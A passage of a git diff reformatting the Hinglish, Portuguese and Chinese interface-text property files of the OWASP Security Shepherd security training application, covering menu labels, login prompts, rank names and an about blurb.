-index.link.admin.cheatSheet.manage.create=Create New Cheat Sheet
-index.link.admin.cheatSheet.manage.disable=Disable Cheat Sheets
-index.link.admin.cheatSheet.manage.enable=Enable Cheat Sheets
-index.link.admin.config.change=Change Module Layout
-index.link.admin.config.feedback=Feedback Configuration
-index.link.admin.config.openClose=Open/Close Registration
-index.link.admin.config.scoreboard=Scoreboard Configuration
-index.link.admin.config.coreDb=Set Core Database
-index.link.admin.moduleManage=Module Management
-index.link.admin.moduleManage.block=Module Block Setup
-index.link.admin.moduleManage.openClose=Open and Close Modules
-index.link.admin.moduleManage.openCloseCategory=Open or Close by Category
-index.link.admin.moduleManage.feedback=View Feedback
-index.link.admin.moduleManage.progress=View Progress
-index.link.admin.userMange=User Management
-index.link.admin.userMange.addPlayer=Add Players
-index.link.admin.userMange.addPoints=Add / Deduct Player Points
-index.link.admin.userMange.assignPlayer=Assign Players to Class
-index.link.admin.userMange.createClass=Create Class
-index.link.admin.userMange.createAdmin=Create New Admin
-index.link.admin.userMange.resetPass=Reset Password
-index.link.admin.userMange.setDefaultPlayerClass=Set Default Player Class
-index.link.admin.userMange.suspendPlayer=Suspend Player
-index.link.admin.userMange.unsuspendPlayer=Undo Suspend Player
-index.link.admin.userMange.upgradeToAdmin=Upgrade Player to Admin
-login.text.sponsers=Project k Sponsors
-readyToPlay.title.readyToPlay=Security Shepherd - Tum Taiyar ho?
-readyToPlay.header.notReady=Tum taiyar nahi ho!
-readyToPlay.title.enteredGame=tum game me enter ho gaye!
-login.text.proxy_question=Tumhe proxy chahiye?
-login.text.download_proxy=Download  HTTP Proxy yahase
-login.link.zap_win=ZAP  Windows k liye
-login.link.zap_lin=ZAP  Linux  k liye
-login.link.zap_mac=ZAP  Mac  k liye
-blockedMessage.text.info.levelBlocked=Tumh Acche ja rahe ho! Administrator ne currently is level ko closedkiya he. To ye level kab available hoga ye  janne k liye,jo is application ka in charge  hai usse puccho!
-getStarted.text.moduleInfo.openFloor=Ab tum signed in ho, lets get started with some Security Shepherd modules! To start a module, click on the list headers, <span><a>Lessons</a></span> or <span><a>Modules</a></span>, in the side menu to see what modules are currently available!
-getStarted.text.moduleInfo.incrementalFloor=Ab tum signed in ho, lets get started with some Security Shepherd challenges! To start one, click the &quot;Get Next Challenge&quot; button on the left!
-getStarted.text.moduleInfo=Ab tum signed in ho, lets get started with some Security Shepherd modules! To start a module, click on the list headers, such as <span><a>Field Training</a></span> or <span><a>Corporal</a></span>, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth! 
-getStarted.text.configureShepherd.asAnAdmin=Administrator k taur pe tum  Security Shepherd ke scope ko set kar sakte ho. tum turant game layout ko Web or Mobile Application change kar sakate ho, 
+generic.text.aboutSecShep = About Security Shepherd
+generic.text.admin = Admin
+generic.text.cheat = Cheat
+generic.text.challenges = Chunauti
+generic.text.commentMessage.1 = Aap currently core server per dekh rahe ho. 
+generic.text.commentMessage.2 = Yaha pe tumhare liye Security Shepherd  par koi level related mahiti nahi he!. 
+generic.text.commentMessage.3 = Tum Shayad is page par embedded iframe khoj rahe ho. 
+generic.text.commentMessage.4 = Is tool ko firebug ki tarah use kro aur simple banao.
+generic.text.configuration = Configuration
+generic.text.configureShepherd = Configure Shepherd
+generic.text.confirmPasswd = Confirm Password
+generic.text.confirmEmailAddr = Confirm Email
+generic.text.emailAddr = Email Address
+generic.text.lessons = Lessons
+generic.text.login = Login
+generic.text.logout = Logout
+generic.text.loading = Loading...
+generic.text.ssRegister = OWASP Security Shepherd - Register
+generic.text.password = Password
+generic.text.pleaseWait = Please Wait!
+generic.text.register = Register
+generic.text.scoreboard = Scoreboard
+generic.text.searchModules = Search Modules
+generic.text.shepherdVersion = Security Shepherd Version: 2.4
+generic.text.sorryError = Sorry yahape error payi gayi he
+generic.text.submitResult =  Result Key yaha pe submit karo
+generic.text.submit = Submit
+generic.text.username = Username
+generic.text.welcome = Welcome
+
+getter.button.completed = Completed
+getter.button.nextChallenge = Get Next Challenge
+getter.button.finished = Tumhne pura kiya!
+getter.button.noModulesFound = Koi Modules Mil nahi rahe
+getter.tournamentRank.1 = Field Training
+getter.tournamentRank.2 = Private
+getter.tournamentRank.3 = Corporal
+getter.tournamentRank.4 = Sergeant
+getter.tournamentRank.5 = Lieutenant
+getter.tournamentRank.6 = Major
+getter.tournamentRank.7 = Admiral
+
+getStarted.text.lets_start = Let's Get Started
+getStarted.button.openLevels.all = Open All Levels
+getStarted.button.openLevels.web = Open Web App Levels Only
+getStarted.button.openLevels.mobile = Open Mobile Levels Only
+getStarted.button.closeLevels = Close All Levels
+blockedMessage.text.heading.levelBlocked = Level Currently Blocked
+index.link.admin.cheatSheet.manage = Cheat Sheet Management
+index.link.admin.cheatSheet.manage.create = Create New Cheat Sheet
+index.link.admin.cheatSheet.manage.disable = Disable Cheat Sheets
+index.link.admin.cheatSheet.manage.enable = Enable Cheat Sheets
+index.link.admin.config.change = Change Module Layout
+index.link.admin.config.feedback = Feedback Configuration
+index.link.admin.config.openClose = Open/Close Registration
+index.link.admin.config.scoreboard = Scoreboard Configuration
+index.link.admin.config.coreDb = Set Core Database
+index.link.admin.moduleManage = Module Management
+index.link.admin.moduleManage.block = Module Block Setup
+index.link.admin.moduleManage.openClose = Open and Close Modules
+index.link.admin.moduleManage.openCloseCategory = Open or Close by Category
+index.link.admin.moduleManage.feedback = View Feedback
+index.link.admin.moduleManage.progress = View Progress
+index.link.admin.userMange = User Management
+index.link.admin.userMange.addPlayer = Add Players
+index.link.admin.userMange.addPoints = Add / Deduct Player Points
+index.link.admin.userMange.assignPlayer = Assign Players to Class
+index.link.admin.userMange.createClass = Create Class
+index.link.admin.userMange.createAdmin = Create New Admin
+index.link.admin.userMange.resetPass = Reset Password
+index.link.admin.userMange.setDefaultPlayerClass = Set Default Player Class
+index.link.admin.userMange.suspendPlayer = Suspend Player
+index.link.admin.userMange.unsuspendPlayer = Undo Suspend Player
+index.link.admin.userMange.upgradeToAdmin = Upgrade Player to Admin
+login.text.sponsers = Project k Sponsors
+readyToPlay.title.readyToPlay = Security Shepherd - Tum Taiyar ho?
+readyToPlay.header.notReady = Tum taiyar nahi ho!
+readyToPlay.title.enteredGame = tum game me enter ho gaye!
+login.text.proxy_question = Tumhe proxy chahiye?
+login.text.download_proxy = Download  HTTP Proxy yahase
+
+
+login.link.zap_win = ZAP  Windows k liye
+login.link.zap_lin = ZAP  Linux  k liye
+login.link.zap_mac = ZAP  Mac  k liye
+
+
+blockedMessage.text.info.levelBlocked = Tumh Acche ja rahe ho! Administrator ne currently is level ko closedkiya he. To ye level kab available hoga ye  janne k liye,jo is application ka in charge  hai usse puccho!
+getStarted.text.moduleInfo.openFloor = Ab tum signed in ho, lets get started with some Security Shepherd modules! To start a module, click on the list headers, <span><a>Lessons</a></span> or <span><a>Modules</a></span>, in the side menu to see what modules are currently available!
+getStarted.text.moduleInfo.incrementalFloor = Ab tum signed in ho, lets get started with some Security Shepherd challenges! To start one, click the &quot;Get Next Challenge&quot; button on the left!
+getStarted.text.moduleInfo = Ab tum signed in ho, lets get started with some Security Shepherd modules! To start a module, click on the list headers, such as <span><a>Field Training</a></span> or <span><a>Corporal</a></span>, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth! 
+getStarted.text.configureShepherd.asAnAdmin =  Administrator k taur pe tum  Security Shepherd ke scope ko set kar sakte ho. tum turant game layout ko Web or Mobile Application change kar sakate ho, 
 or you can open the Admin Module Management menu, at the top left of the page,specific topics ko open ya close krne k liye.
-getStarted.text.checkShepConfigMsg=agar tum  paragraph k bad message nahi dekh  pate to please ensure  Security Shepherd instance sahi configured hua hai.
-getStarted.text.info.changePassword=tumhara password is a temporary password. so  koi aur bhi janta hai aapke password ko! Pahele apne password ko change kar k secure bano!
-login.text.info=Use your <a><span>Security Shepherd Credentials<span></a> to Login.
-login.text.regInfo=Register a <a href="register.jsp"><span>Security Shepherd Account</span></a> here!
-login.text.about_blurb=The OWASP Security Shepherd project ko isi liye banaya gaya hai ki application security awareness  ko support mile or sudhar ho,sari tarike ki skill-set vale demographic people k liye.Is project users ko manual penetration testing skills sikhata hai aur sudhar bhi lata hai.Sare lesson aur challenge techniques se ye sabit hota hai.Ye lesson user ko module complete karne me sabhi help karega, ki jaha ye challenge user is lesson se kya sikha vo use kar shakta hai. </p><p>The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security muskeliyo ko explre karta hai aur system par uske impact ko bhi samajata hai.  Is me se kai levels pahechan or fix nahi pane vale uplabdh workaround aur risks jaise ki blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration.The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
-login.text.sponsers_blurb=The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
-login.text.thanks=The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
-readyToPlay.text.info.notReady=Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
-readyToPlay.text.info.enteredGame=Now that you can see this, you're good to go! Get cracking on lessons and challenges! <br/><br/> Remember, the levels you are playing are sub applications. Keep the game play in these applications!  Stay away from your session ID's! You'll just log yourself out of you change them!<br/><br/> If you havn't already configured a web proxy, you better! It makes things much easier!
+getStarted.text.checkShepConfigMsg = agar tum  paragraph k bad message nahi dekh  pate to please ensure  Security Shepherd instance sahi configured hua hai.
+getStarted.text.info.changePassword = tumhara password is a temporary password. so  koi aur bhi janta hai aapke password ko! Pahele apne password ko change kar k secure bano!
+login.text.info = Use your <a><span>Security Shepherd Credentials<span></a> to Login.
+login.text.regInfo = Register a <a href="register.jsp"><span>Security Shepherd Account</span></a> here!
+login.text.about_blurb = The OWASP Security Shepherd project ko isi liye banaya gaya hai ki application security awareness  ko support mile or sudhar ho,sari tarike ki skill-set vale demographic people k liye.Is project users ko manual penetration testing skills sikhata hai aur sudhar bhi lata hai.Sare lesson aur challenge techniques se ye sabit hota hai.Ye lesson user ko module complete karne me sabhi help karega, ki jaha ye challenge user is lesson se kya sikha vo use kar shakta hai. </p><p>The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security muskeliyo ko explre karta hai aur system par uske impact ko bhi samajata hai.  Is me se kai levels pahechan or fix nahi pane vale uplabdh workaround aur risks jaise ki blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration.The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
+login.text.sponsers_blurb = The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
+login.text.thanks = The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
+readyToPlay.text.info.notReady = Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
+readyToPlay.text.info.enteredGame = Now that you can see this, you're good to go! Get cracking on lessons and challenges! <br/><br/> Remember, the levels you are playing are sub applications. Keep the game play in these applications!  Stay away from your session ID's! You'll just log yourself out of you change them!<br/><br/> If you havn't already configured a web proxy, you better! It makes things much easier!
 
 
 
diff --git a/src/main/resources/i18n/text_pt.properties b/src/main/resources/i18n/text_pt.properties
index 0aa0b47a6..f08d9c3dc 100644
--- a/src/main/resources/i18n/text_pt.properties
+++ b/src/main/resources/i18n/text_pt.properties
@@ -1,95 +1,101 @@
-generic.text.aboutSecShep=Sobre Security Shepherd
-generic.text.admin=Admin
-generic.text.cheat=Cheat
-generic.text.challenges=Desafios
-generic.text.commentMessage.1=Você está navegando na servidor central.
-generic.text.commentMessage.2=Você não vai encontrar nada aqui.
-generic.text.commentMessage.3=Você está procurando para o iframe na página?
-generic.text.commentMessage.4=Você deve tentar uma ferramenta como Firebug para fazer este mais fácil.
-generic.text.configuration=Configuração
-generic.text.configureShepherd=Configurar Security Shepherd
-generic.text.confirmPasswd=Confere Senha
-generic.text.confirmEmailAddr=Confere Email
-generic.text.emailAddr=Email
-generic.text.lessons=Aulas 
-generic.text.login=Logar-se
-generic.text.logout=Deslogar
-generic.text.loading=Loading...
-generic.text.ssRegister=OWASP Security Shepherd - Registrar
-generic.text.password=Senha
-generic.text.pleaseWait=Esperar por favor
-generic.text.register=Registrar
-generic.text.scoreboard=Placar
-generic.text.searchModules=Busca liçãos
-generic.text.shepherdVersion=Security Shepherd Versão: 3.0
-generic.text.sorryError=Descupla, mas havia um erro
-generic.text.submitResult=Enviar seu chave resultado aqui
-generic.text.submit=Enviar
-generic.text.username=Nome de usuário
-generic.text.welcome=Bem-vindo
-getter.button.completed=Concluído
-getter.button.nextChallenge=Obter próximo desafio
-getter.button.finished=Você terminou
-getter.button.noModulesFound=Não há aulas
-getter.tournamentRank.1=Field Training
-getter.tournamentRank.2=Private
-getter.tournamentRank.3=Corporal
-getter.tournamentRank.4=Sergeant
-getter.tournamentRank.5=Lieutenant
-getter.tournamentRank.6=Major
-getter.tournamentRank.7=Admiral
-getStarted.text.lets_start=Vamos começar!
-getStarted.button.openLevels.all=Abrir Todos Aulas
-getStarted.button.openLevels.web=Abrir Todos Aulas de Web
-getStarted.button.openLevels.mobile=Abra Todos Aulas de Móvel
-getStarted.button.closeLevels=Fechar Todos Aulas
-blockedMessage.text.heading.levelBlocked=Leção não disponível
-index.link.admin.cheatSheet.manage=Administração de Cheats
-index.link.admin.cheatSheet.manage.create=Criar Novos Cheats
-index.link.admin.cheatSheet.manage.disable=Desativar Cheat
-index.link.admin.cheatSheet.manage.enable=Habilitar Cheats
-index.link.admin.config.change=Mudar o Plano de Aulas
-index.link.admin.config.feedback=Configuração de Comentários 
-index.link.admin.config.openClose=Abrir/Fechar Registro
-index.link.admin.config.scoreboard=Configuração de Placar 
-index.link.admin.config.coreDb=Configurar o banco de dados
-index.link.admin.moduleManage=Administração de Aulas
-index.link.admin.moduleManage.block=Configurar o Bloco de Aulas
-index.link.admin.moduleManage.openClose=Abrir/Fechar Aulas
-index.link.admin.moduleManage.openCloseCategory=Abrir/Fechar Por Categoria
-index.link.admin.moduleManage.feedback=Ver Comentários
-index.link.admin.moduleManage.progress=Ver Progresso
-index.link.admin.userMange=Administração de Usuários
-index.link.admin.userMange.addPlayer=Adicionar de Jogadores
-index.link.admin.userMange.addPoints=Adicionar / Remover Pontos de Jogadores
-index.link.admin.userMange.assignPlayer=Colocar os Jogadores em uma Classe
-index.link.admin.userMange.createClass=Criar Classe
-index.link.admin.userMange.createAdmin=Criar um Novo Admin
-index.link.admin.userMange.resetPass=Repor Senha
-index.link.admin.userMange.setDefaultPlayerClass=Definir o Normal Jogador Classe 
-index.link.admin.userMange.suspendPlayer=Suspender Jodagor
-index.link.admin.userMange.unsuspendPlayer=Desfazer Suspender Jodagor
-index.link.admin.userMange.upgradeToAdmin=Mudar um Jogador de Admin
-login.text.sponsers=Patrocinadores de Security Shepherd
-readyToPlay.title.readyToPlay=Security Shepherd - Pronta?
-readyToPlay.header.notReady=Você não está pronta
-readyToPlay.title.enteredGame=Você está no jogo
-login.text.proxy_question=Você precisa de um Proxy de Internet?
-login.text.download_proxy=Obter um Proxy de Internet aqui.
-login.link.zap_win=ZAP para Windows
-login.link.zap_lin=ZAP para Linux
-login.link.zap_mac=ZAP para Mac
-blockedMessage.text.info.levelBlocked=Você está fazendo muito bem. Bem faeito! Para ajudar os outros jogadores, o admin tenha fechado este aula para algum minutos. Esperar por favor.
-getStarted.text.moduleInfo.openFloor=Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para começar um, clicar o "Obter próximo desafio" botão no esquerdo.
-getStarted.text.moduleInfo.incrementalFloor=Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para começar um, clicar o "Obter próximo desafio" botão no esquerdo.
-getStarted.text.moduleInfo=Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para iniçiar um lição, clicar on the list headers, such as <span><a>Field Training</a></span> or <span><a>Corporal</a></span>, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth! 
-getStarted.text.configureShepherd.asAnAdmin=As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
-getStarted.text.checkShepConfigMsg=If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
-getStarted.text.info.changePassword=Sua senha está temporarío. Por favor mudar isso agora.
-login.text.info=Usar seu <a><span>informação de usuário do Security Shepherd</span></a> para logar-se
-login.text.regInfo=Registerar uma <a href="register.jsp"><span>conta de Security Shepherd </span></a> aqui!
-login.text.about_blurb=The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. </p><p>The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
-login.text.sponsers_blurb=The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
-login.text.thanks=The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
-readyToPlay.text.info.notReady=Refrescar a página! Se esta acontecer de novo; deslogar e logar-se! Se você ainda tem problemas, fala com um admin.
-readyToPlay.text.info.enteredGame=Agora que você pode ver este, você está pronta começar. Começar com algum aulas! <br/><br/> Lembrar, os aulas são sub aplicações. Manter seu jogar nesses lugares! Por favor, não mudar o Session IDs ou você vai deslogar<br/><br/> Também, não esquecer usar um Proxy. Está muito máis fácil 
+generic.text.aboutSecShep = Sobre Security Shepherd
+generic.text.admin = Admin
+generic.text.cheat = Cheat
+generic.text.challenges = Desafios
+generic.text.commentMessage.1 = Você está navegando na servidor central.
+generic.text.commentMessage.2 = Você não vai encontrar nada aqui.
+generic.text.commentMessage.3 = Você está procurando para o iframe na página?
+generic.text.commentMessage.4 = Você deve tentar uma ferramenta como Firebug para fazer este mais fácil.
+generic.text.configuration = Configuração
+generic.text.configureShepherd = Configurar Security Shepherd
+generic.text.confirmPasswd = Confere Senha
+generic.text.confirmEmailAddr = Confere Email
+generic.text.emailAddr = Email
+generic.text.lessons = Aulas 
+generic.text.login = Logar-se
+generic.text.logout = Deslogar
+generic.text.loading = Loading...
+generic.text.ssRegister = OWASP Security Shepherd - Registrar
+generic.text.password = Senha
+generic.text.pleaseWait = Esperar por favor
+generic.text.register = Registrar
+generic.text.scoreboard = Placar
+generic.text.searchModules = Busca liçãos
+generic.text.shepherdVersion = Security Shepherd Versão: 3.0
+generic.text.sorryError = Descupla, mas havia um erro
+generic.text.submitResult = Enviar seu chave resultado aqui
+generic.text.submit = Enviar
+generic.text.username = Nome de usuário
+generic.text.welcome = Bem-vindo
+
+getter.button.completed = Concluído
+getter.button.nextChallenge = Obter próximo desafio
+getter.button.finished = Você terminou
+getter.button.noModulesFound = Não há aulas
+getter.tournamentRank.1 = Field Training
+getter.tournamentRank.2 = Private
+getter.tournamentRank.3 = Corporal
+getter.tournamentRank.4 = Sergeant
+getter.tournamentRank.5 = Lieutenant
+getter.tournamentRank.6 = Major
+getter.tournamentRank.7 = Admiral
+
+getStarted.text.lets_start = Vamos começar!
+getStarted.button.openLevels.all = Abrir Todos Aulas
+getStarted.button.openLevels.web = Abrir Todos Aulas de Web
+getStarted.button.openLevels.mobile = Abra Todos Aulas de Móvel
+getStarted.button.closeLevels = Fechar Todos Aulas
+blockedMessage.text.heading.levelBlocked = Leção não disponível
+index.link.admin.cheatSheet.manage =  Administração de Cheats
+index.link.admin.cheatSheet.manage.create = Criar Novos Cheats
+index.link.admin.cheatSheet.manage.disable = Desativar Cheat
+index.link.admin.cheatSheet.manage.enable = Habilitar Cheats
+index.link.admin.config.change = Mudar o Plano de Aulas
+index.link.admin.config.feedback = Configuração de Comentários 
+index.link.admin.config.openClose = Abrir/Fechar Registro
+index.link.admin.config.scoreboard = Configuração de Placar 
+index.link.admin.config.coreDb = Configurar o banco de dados
+index.link.admin.moduleManage = Administração de Aulas
+index.link.admin.moduleManage.block = Configurar o Bloco de Aulas
+index.link.admin.moduleManage.openClose = Abrir/Fechar Aulas
+index.link.admin.moduleManage.openCloseCategory = Abrir/Fechar Por Categoria
+index.link.admin.moduleManage.feedback = Ver Comentários
+index.link.admin.moduleManage.progress = Ver Progresso
+index.link.admin.userMange = Administração de Usuários
+index.link.admin.userMange.addPlayer = Adicionar de Jogadores
+index.link.admin.userMange.addPoints = Adicionar / Remover Pontos de Jogadores
+index.link.admin.userMange.assignPlayer = Colocar os Jogadores em uma Classe
+index.link.admin.userMange.createClass = Criar Classe
+index.link.admin.userMange.createAdmin = Criar um Novo Admin
+index.link.admin.userMange.resetPass = Repor Senha
+index.link.admin.userMange.setDefaultPlayerClass = Definir o Normal Jogador Classe 
+index.link.admin.userMange.suspendPlayer = Suspender Jodagor
+index.link.admin.userMange.unsuspendPlayer = Desfazer Suspender Jodagor
+index.link.admin.userMange.upgradeToAdmin = Mudar um Jogador de Admin
+login.text.sponsers = Patrocinadores de Security Shepherd
+readyToPlay.title.readyToPlay = Security Shepherd - Pronta?
+readyToPlay.header.notReady = Você não está pronta
+readyToPlay.title.enteredGame =  Você está no jogo
+login.text.proxy_question = Você precisa de um Proxy de Internet?
+login.text.download_proxy = Obter um Proxy de Internet aqui.
+
+
+login.link.zap_win = ZAP para Windows
+login.link.zap_lin = ZAP para Linux
+login.link.zap_mac = ZAP para Mac
+
+
+blockedMessage.text.info.levelBlocked = Você está fazendo muito bem. Bem faeito! Para ajudar os outros jogadores, o admin tenha fechado este aula para algum minutos. Esperar por favor.
+getStarted.text.moduleInfo.openFloor = Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para começar um, clicar o "Obter próximo desafio" botão no esquerdo.
+getStarted.text.moduleInfo.incrementalFloor = Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para começar um, clicar o "Obter próximo desafio" botão no esquerdo.
+getStarted.text.moduleInfo = Agora que você está aqui, vamos começar com algum desafios de Security Shepherd! Para iniçiar um lição, clicar on the list headers, such as <span><a>Field Training</a></span> or <span><a>Corporal</a></span>, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth! 
+getStarted.text.configureShepherd.asAnAdmin = As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
+getStarted.text.checkShepConfigMsg = If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
+getStarted.text.info.changePassword = Sua senha está temporarío. Por favor mudar isso agora.
+login.text.info = Usar seu <a><span>informação de usuário do Security Shepherd</span></a> para logar-se
+login.text.regInfo = Registerar uma <a href="register.jsp"><span>conta de Security Shepherd </span></a> aqui!
+login.text.about_blurb = The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. </p><p>The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
+login.text.sponsers_blurb = The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
+login.text.thanks = The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
+readyToPlay.text.info.notReady = Refrescar a página! Se esta acontecer de novo; deslogar e logar-se! Se você ainda tem problemas, fala com um admin.
+readyToPlay.text.info.enteredGame = Agora que você pode ver este, você está pronta começar. Começar com algum aulas! <br/><br/> Lembrar, os aulas são sub aplicações. Manter seu jogar nesses lugares! Por favor, não mudar o Session IDs ou você vai deslogar<br/><br/> Também, não esquecer usar um Proxy. Está muito máis fácil 
diff --git a/src/main/resources/i18n/text_zh.properties b/src/main/resources/i18n/text_zh.properties
index 7ae0a781e..f33979090 100644
--- a/src/main/resources/i18n/text_zh.properties
+++ b/src/main/resources/i18n/text_zh.properties
@@ -1,98 +1,104 @@
-generic.text.aboutSecShep=\u5173\u4E8E Security Shepherd
-generic.text.admin=\u7BA1\u7406\u5458
-generic.text.cheat=\u63D0\u793A
-generic.text.challenges=\u6311\u6218
-generic.text.commentMessage.1=You are currently looking at the core server. 
-generic.text.commentMessage.2=Nothing related to the levels in Security Shepherd will be found in here. 
-generic.text.commentMessage.3=You might be looking for the iframe embedded in the page. 
-generic.text.commentMessage.4=\u4F7F\u7528\u5982 Firebug \u8FD9\u6837\u7684\u5DE5\u5177\u8BA9\u751F\u6D3B\u66F4\u7B80\u5355.
-generic.text.configuration=\u914D\u7F6E
-generic.text.configureShepherd=\u914D\u7F6E Shepherd
-generic.text.confirmPasswd=\u786E\u8BA4\u5BC6\u7801
-generic.text.confirmEmailAddr=\u786E\u8BA4\u90AE\u7BB1\u5730\u5740
-generic.text.emailAddr=\u90AE\u7BB1\u5730\u5740
-generic.text.lessons=\u8BFE\u7A0B
-generic.text.login=\u767B\u5F55
-generic.text.logout=\u6CE8\u9500
-generic.text.loading=\u52A0\u8F7D\u4E2D...
-generic.text.ssRegister=OWASP Security Shepherd - \u6CE8\u518C
-generic.text.password=\u5BC6\u7801
-generic.text.pleaseWait=\u8BF7\u7A0D\u4FAF!
-generic.text.register=\u6CE8\u518C
-generic.text.scoreboard=\u8BB0\u5206\u677F
-generic.text.searchModules=Search Modules
-generic.text.shepherdVersion=Security Shepherd \u7248\u672C: 3.0
-generic.text.sorryError=Sorry but there was an error
-generic.text.submitResult=\u5728\u8FD9\u63D0\u4EA4\u7ED3\u679C\u94A5\u5319
-generic.text.submit=\u63D0\u4EA4
-generic.text.username=\u7528\u6237\u540D
-generic.text.welcome=\u6B22\u8FCE
-getter.button.completed=\u5B8C\u6210
-getter.button.nextChallenge=\u8FDB\u5165\u4E0B\u4E00\u4E2A\u6311\u6218
-getter.button.finished=\u4F60\u5DF2\u7ECF\u5B8C\u6210!
-getter.button.noModulesFound=\u6CA1\u6709\u677F\u5757
-getter.tournamentRank.1=Field Training
-getter.tournamentRank.2=Private
-getter.tournamentRank.3=Corporal
-getter.tournamentRank.4=Sergeant
-getter.tournamentRank.5=Lieutenant
-getter.tournamentRank.6=Major
-getter.tournamentRank.7=Admiral
-getStarted.text.lets_start=\u8BA9\u6211\u4EEC\u5F00\u59CB\u5427
-getStarted.button.openLevels.all=Open All Levels
-getStarted.button.openLevels.web=Open Web App Levels Only
-getStarted.button.openLevels.mobile=Open Mobile Levels Only
-getStarted.button.closeLevels=Close All Levels
-blockedMessage.text.heading.levelBlocked=Level Currently Blocked
-index.link.admin.cheatSheet.manage=Cheat Sheet Management
-index.link.admin.cheatSheet.manage.create=Create New Cheat Sheet
-index.link.admin.cheatSheet.manage.disable=Disable Cheat Sheets
-index.link.admin.cheatSheet.manage.enable=Enable Cheat Sheets
-index.link.admin.config.change=Change Module Layout
-index.link.admin.config.feedback=Feedback Configuration
-index.link.admin.config.openClose=Open/Close Registration
-index.link.admin.config.scoreboard=Scoreboard Configuration
-index.link.admin.config.coreDb=Set Core Database
-index.link.admin.moduleManage=Module Management
-index.link.admin.moduleManage.block=Module Block Setup
-index.link.admin.moduleManage.openClose=Open and Close Modules
-index.link.admin.moduleManage.openCloseCategory=Open or Close by Category
-index.link.admin.moduleManage.feedback=View Feedback
-index.link.admin.moduleManage.progress=View Progress
-index.link.admin.userMange=User Management
-index.link.admin.userMange.addPlayer=Add Players
-index.link.admin.userMange.addPoints=Add / Deduct Player Points
-index.link.admin.userMange.assignPlayer=Assign Players to Class
-index.link.admin.userMange.createClass=Create Class
-index.link.admin.userMange.createAdmin=Create New Admin
-index.link.admin.userMange.resetPass=Reset Password
-index.link.admin.userMange.setDefaultPlayerClass=Set Default Player Class
-index.link.admin.userMange.suspendPlayer=Suspend Player
-index.link.admin.userMange.unsuspendPlayer=Undo Suspend Player
-index.link.admin.userMange.upgradeToAdmin=Upgrade Player to Admin
-login.text.sponsers=Project Sponsors
-readyToPlay.title.readyToPlay=Security Shepherd - \u51C6\u5907\u597D\u4E86\u5417?
-readyToPlay.header.notReady=\u8FD8\u6CA1\u51C6\u5907\u597D!
-readyToPlay.title.enteredGame=\u5DF2\u7ECF\u8FDB\u5165\u6E38\u620F!
-login.text.proxy_question=\u4F60\u9700\u8981\u4EE3\u7406\u5417?
-login.text.download_proxy=\u4E0B\u8F7D \u4E00\u4E2A HTTP \u4EE3\u7406
-login.link.zap_win=ZAP Windows \u7248
-login.link.zap_lin=ZAP Linux \u7248
-login.link.zap_mac=ZAP Mac \u7248
